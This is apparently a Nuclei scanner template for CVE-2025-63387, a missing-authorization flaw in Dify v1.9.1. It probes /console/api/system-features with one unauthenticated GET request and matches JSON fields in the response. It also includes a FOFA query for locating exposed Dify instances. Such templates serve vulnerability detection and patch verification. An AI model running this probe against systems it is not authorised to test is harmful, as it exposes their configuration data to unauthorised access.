id: CVE-2025-63387 info: name: Dify v1.9.1 - Broken Access Control author: DhiyaneshDK severity: medium description: | Dify v1.9.1 contains an insecure permissions vulnerability caused by lack of authorization checks in /console/api/system-features endpoint, letting unauthenticated attackers access sensitive system configuration data. impact: | Unauthenticated attackers can access sensitive system configuration data, potentially leading to information disclosure. remediation: | Update to the latest version of Dify. reference: - https://nvd.nist.gov/vuln/detail/CVE-2025-63387 classification: cve-id: CVE-2025-63387 epss-score: 0.28042 epss-percentile: 0.97901 cwe-id: CWE-287 metadata: verified: true max-request: 1 fofa-query: app="Dify" tags: cve,cve2025,dify,auth-bypass,vkev http: - method: GET path: - "{{BaseURL}}/console/api/system-features" matchers-condition: and matchers: - type: word part: body words: - '"status":' - '"sso_enforced_for_signin":' condition: and - type: word part: content_type words: - 'application/json' - type: status status: - 200 # digest: 4a0a00473045022028834c11f8a358d890a34fb0e8cac57aac056fe3b96b36df7d0c35e87f3ec2eb022100a627324b0bfed58322fd5806b40244040032a71aa88c7019ea0d4b9d52994514:922c64590222798bb761d5b6d8e72950